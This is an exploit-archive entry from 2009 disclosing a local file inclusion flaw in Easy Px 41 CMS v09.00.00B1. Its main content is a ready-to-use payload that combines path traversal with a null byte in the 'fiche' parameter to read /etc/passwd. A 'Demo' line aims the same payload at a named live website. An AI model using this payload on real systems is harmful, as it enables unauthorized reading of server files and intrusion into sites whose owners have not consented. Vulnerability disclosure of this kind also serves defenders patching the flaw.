id: 5264
date: 05/26/2009
title: Easy Px 41 CMS v09.00.00B1 (fiche) Local File Inclusion Vulnerability
author: ThE g0bL!N
cves: 

=====================================================================
Easy Px 41 CMS v09.00.00B1 (fiche) Local File Inclusion Vulnerability
=====================================================================


# Easy Px 41 CMS v09.00.00B1 (fiche) Local File Include Exploit
# D.Script: http://www.easy-script.com/scripts-dl/EPX41v9.zip
# Discovered by: ThE g0bL!N
# Greetz To: ALL My Friend (dz)
# Exploit: /[path]/?view=LivreDor&fiche=../../../../../../../../etc/passwd%00
# Demo :http://www.epx41.be/?view=LivreDor&fiche=../../../../../../../../etc/passwd%00



#  0day.today [2023-03-22]  #